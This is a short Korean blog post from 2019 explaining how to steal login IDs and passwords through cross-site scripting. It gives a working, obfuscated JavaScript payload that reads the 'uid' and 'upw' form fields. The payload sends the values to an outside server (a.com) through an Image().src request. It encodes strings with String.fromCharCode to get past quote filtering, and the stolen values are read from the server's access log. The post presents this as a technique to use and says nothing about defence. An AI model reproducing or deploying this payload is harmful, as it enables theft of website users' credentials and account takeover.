웹/XSS

XSS로 아이디, 패스워드 탈취

범고래_1 2019. 6. 26. 00:25

원리는 다음과 같다.

1. document.getElementById('uid').value로 아이디, 패스워드를 가져온다.

2. 변수에 넣고 내 서버로 날리면 끝.

3. location.href같은거 쓰면 페이지 이동이 되니까, 그냥 Image().src='http://server/id/pw';

이렇게 해주고 서버에 access.log를 본다. (아니면 파라미터 넘겨도 되고)

4. 쿼터가 막혀있을 수 있으니 String.fromCharCode()를 써서 아스키화 한다.


id=document.getElementById(String.fromCharCode(117,105,100)).value;

pw=document.getElementById(String.fromCharCode(117,112,119)).value;

Image().src=String.fromCharCode(104,116,116,112,58,47,47,97,46,99,111,109,47).concat(id).concat(String.fromCharCode(47)).concat(pw);

// request to http://a.com/id/pw